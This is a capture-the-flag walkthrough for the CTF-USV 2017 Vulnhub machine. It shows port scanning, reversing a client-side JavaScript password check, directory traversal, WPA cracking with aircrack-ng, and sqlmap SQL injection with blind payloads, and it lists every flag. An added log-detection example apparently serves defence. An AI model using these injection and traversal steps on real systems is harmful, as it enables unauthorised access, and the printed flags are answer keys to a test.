
Hello all!

After a three-week New Year vacation, a new Vulnhub.com boot2root challenge is a good way to start 2018; today it is CTF-USV 2017.

If you are interested in how I found all the flags, welcome!

Let's start. The IP address can be found after the VM is booted.

If you do not want to read the whole write-up below, here are some small hints:

1) Have a look at the SSL certificate

2) Have a look at the JavaScript on tcp/80

3) Have a look at the page source on tcp/15020

4) Find the web directory with a network traffic dump, recover the password and use it

5) Find the SQL injection in the admin area

 

Below is my own path to the flags.

Nmap helps us enumerate the open ports:

Not shown: 65526 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
4369/tcp  open  epmd
5222/tcp  open  xmpp-client
5269/tcp  open  xmpp-server
5280/tcp  open  xmpp-bosh
15020/tcp open  unknown
37833/tcp open  unknown

The next step is to detect service and OS versions; use these Nmap options: -A -sV

OK, we have an up-to-date Debian with a patched ProFTPD 1.3.5b, a Jabber service and some HTTP/HTTPS services.

 

The first flag is very easy: it is located in the SSL certificate data on tcp/15020: France: a51f0eda836e4461c3316a2ec9dad743

At first I was not convinced that it was a flag, but when I had found all the other flags and only one was left, I decided that it must be, because I could not verify it anywhere =)

 

Let's continue with the web services, and do what we usually do first: brute-force subdirectories!

http://192.168.56.102/admin2/ shows something like an admin panel, but the password is verified in JavaScript.

Copy this JavaScript, beautify it, and here is what we have: the value 1079950212331060 is checked; if it matches we get access and see the flag named Italy, if not, a red "Incorrect!" message.

To complete this step, just work the arithmetic on _0xb252x4 backwards and you get the flag.

Italy:46202df2ae6c46db8efc0af148370a78

var _0xeb5f=["value","passinp","password","forms","color","style","valid","getElementById","green","innerHTML","Italy:","red","Incorrect!"];

function validate()
{
var _0xb252x2=123211;
var _0xb252x3=3422543454;
var _0xb252x4=document[_0xeb5f[3]][_0xeb5f[2]][_0xeb5f[1]][_0xeb5f[0]];   // document.forms.password.passinp.value (always a string)
var _0xb252x5=md5(_0xb252x4);                                             // md5() is loaded by the page; the flag is "Italy:" + md5(password)
_0xb252x4+= 4469;                 // string concatenation: "77779673" + 4469 = "777796734469"
_0xb252x4-= 234562221224;         // now numeric: 777796734469 - 234562221224 = 543234513245
_0xb252x4*= 1988;                 // 543234513245 * 1988 = 1079950212331060
_0xb252x2-= 2404;                 // decoy variables, never used
_0xb252x3+= 2980097;

if(_0xb252x4== 1079950212331060)
{
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[8];     // valid.style.color = "green"
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[10]+ _0xb252x5;    // valid.innerHTML = "Italy:" + md5(password)
}
else
{
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[11];    // valid.style.color = "red"
document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[12];                // valid.innerHTML = "Incorrect!"
}
return;
}
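To make the reversal explicit, here is an added example (not code from the original page or the challenge) that recovers the password from the constant 1079950212331060 by undoing each step, then replays the page's own arithmetic to confirm it. The first `+=` is string concatenation because the form value is a string, so the reversal strips those characters rather than subtracting.

```javascript
// Added example: undo the obfuscated validate() arithmetic and replay it.
// The constants are the ones in the challenge's admin2 script; nothing else is assumed.
const TARGET = 1079950212331060;
const MUL = 1988;
const SUB = 234562221224;
const APPENDED = "4469";   // `+= 4469` runs on a string, so it appends characters

// Forward logic exactly as the page's validate() applies it to the input string.
function forwardCheck(password) {
  let x = String(password);  // the DOM always hands over a string
  x += 4469;                 // string concatenation, not addition
  x -= SUB;                  // `-=` coerces the string to a number
  x *= MUL;
  return x === TARGET;       // TARGET < 2^53, so the comparison is exact
}

// Reverse each step: divide, add back, then strip the appended digits.
function recoverPassword(target = TARGET) {
  const afterConcat = target / MUL + SUB;       // 543234513245 + 234562221224
  const s = String(afterConcat);                // "777796734469"
  if (!Number.isInteger(afterConcat) || !s.endsWith(APPENDED)) {
    throw new Error("constants do not reverse cleanly");
  }
  return s.slice(0, -APPENDED.length);          // "77779673"
}

// The check runs entirely client-side, so the secret is recoverable from the
// script itself; this kind of "protection" is equivalent to none.
console.log(recoverPassword(), forwardCheck(recoverPassword()));
```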


OK, I got these two flags very fast, and later got stuck for a while with the web site on tcp/15020, until I saw a commented message about download.php in the page source at http://192.168.56.102/blog/:

The message about the image parameter tells us that we have to use a POST request, and it is probably a directory traversal!

I created a simple POST request in Burp and verified it.

And the web server response:

 

Now we can read files that are accessible to the web service, and from the blog we remember a comment from Kevin that flag.txt is located in his home directory, so let's check /home/kevin/flag.txt.

The third flag is captured: Croatia: e4d49769b40647eddda2fe3041b9564c

 

OK, 3 flags. I found the web directory /admin in the blog and tried to find, enumerate and dump all the data from the host, with no luck; the sensitive files are in the admin area, with a possible SQL injection vulnerability. The data grabbed from the host was mostly useless...

I got all the usernames and tried to brute-force FTP, SSH and the admin web panel on the blog site; I also got a MySQL username and password, but no luck, there was no way to connect to the MySQL server...

It was time to think once again. "ENUMERATION IS THE KEY" came to mind, and I started an extended web directory brute-force; the result was very nice: a new web directory named /vault.

 

Now there are 300 web directories named DoorX with 100 subdirectories VaultX in each. Time to write a simple Python script to create the wordlists and fire up Burp Intruder; probably there is something useful in one of these directories.

# Generate the Vault1..Vault100 wordlist for Burp Intruder (Python 3)
for i in range(1, 101):
    print("Vault" + str(i))

Two non-empty web directories were uncovered:

/vault/Door222/Vault70/
ctf.cap
/vault/Door223/Vault1/
rockyou.zip

A quick look at ctf.cap gave an attack vector: recover the WPA password and see what can be done with it (there is also rockyou.zip...) =)

It is aircrack-ng time: aircrack-ng ctf.cap -w rockyou.txt

Password found: minion.666. Nothing interesting was found in the network traffic dump itself, so I decided to try this password on /blog/admin, and it works!

Log in and view the page source: the fourth flag: Philippines: 551d3350f100afc6fac0e4b48d44d380

 

It is time to find the final flag. Signed in to the admin panel, I tried things like editing and deleting posts, with no result; but from the source code I remembered that edit.php is probably vulnerable to SQL injection.

It is time for SQLMap (because I like it):

// Do not forget about the admin cookie =)

sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36'

and it is vulnerable:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9485=9485

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 3390=BENCHMARK(5000000,MD5(0x554e4b4a))
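From the defender's side, the two payload families SQLMap reported here (a tautology for boolean-based blind, a heavy query for time-based blind) are easy to spot in web-server access logs. The following added example (not part of the original post; the log lines are constructed for it) decodes the query string of each request line and flags those probes against edit.php.

```javascript
// Added example (not from the original post): spot the kind of injection
// probes sqlmap sent at edit.php?id= in web-server access logs.
// The Common Log Format lines below are constructed for this example.
const ACCESS_LOG = [
  '192.168.56.1 - - [05/Jan/2018:10:01:02 +0000] "GET /blog/admin/edit.php?id=1 HTTP/1.1" 200 2310',
  '192.168.56.1 - - [05/Jan/2018:10:01:03 +0000] "GET /blog/admin/edit.php?id=1%20AND%209485%3D9485 HTTP/1.1" 200 2310',
  '192.168.56.1 - - [05/Jan/2018:10:01:04 +0000] "GET /blog/admin/edit.php?id=1%20AND%203390%3DBENCHMARK%285000000%2CMD5%280x554e4b4a%29%29 HTTP/1.1" 200 2310',
  '192.168.56.1 - - [05/Jan/2018:10:01:05 +0000] "GET /blog/index.php?id=2 HTTP/1.1" 200 1800',
];

// Patterns for the two techniques sqlmap reported on this target:
// a self-comparing tautology (boolean blind) and a heavy/delay query (time blind).
const PROBES = [
  { name: "boolean-tautology", re: /\b(AND|OR)\s+(\d+)\s*=\s*\2\b/i },
  { name: "time-based-heavy-query", re: /\b(BENCHMARK|SLEEP)\s*\(/i },
];

// Pull the decoded query string out of a CLF request line.
function extractQuery(line) {
  const m = line.match(/"(?:GET|POST)\s+[^?\s]*\?([^\s"]*)/);
  if (!m) return "";
  try { return decodeURIComponent(m[1].replace(/\+/g, " ")); }
  catch (e) { return m[1]; }   // malformed encoding: keep the raw value rather than drop it
}

// Return one finding per line whose query matches a probe pattern.
function detectInjectionProbes(lines) {
  const findings = [];
  for (const line of lines) {
    const q = extractQuery(line);
    for (const p of PROBES) {
      if (p.re.test(q)) { findings.push({ name: p.name, query: q }); break; }
    }
  }
  return findings;
}

console.log(detectInjectionProbes(ACCESS_LOG));
```

The same patterns are worth pairing with a count of requests per source and path per minute, since sqlmap's blind techniques need many requests to extract anything.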

The next steps, enumerating all tables and columns, are not so interesting. Finally I got all the column names, but SQLMap could not dump the data; since we have a SQL injection, we can use a custom SQL query to dump the data manually.

Database: blog
[3 tables]
+----------+
| comments |
| posts    |
| users    |
+----------+

[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| id        | numeric     |
| idcountry | numeric     |
| login     | non-numeric |
| password  | non-numeric |
| published | numeric     |
| text      | non-numeric |
| title     | non-numeric |
+-----------+-------------+

sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36' --sql-query='select id,idcountry,login,password from users where id=1'
[*] 1, , admin, 8ae100f50c9bbcfeb2ab87b72a03273d - this is the admin password, minion.666

Change to id=2 and get the flag for Laos.

Laos: 66c578605c1c63db9e8f0aba923d0c12

Finally all flags are captured.

Thank you to Suceava University for this VM!

 

That's all, thank you for reading!
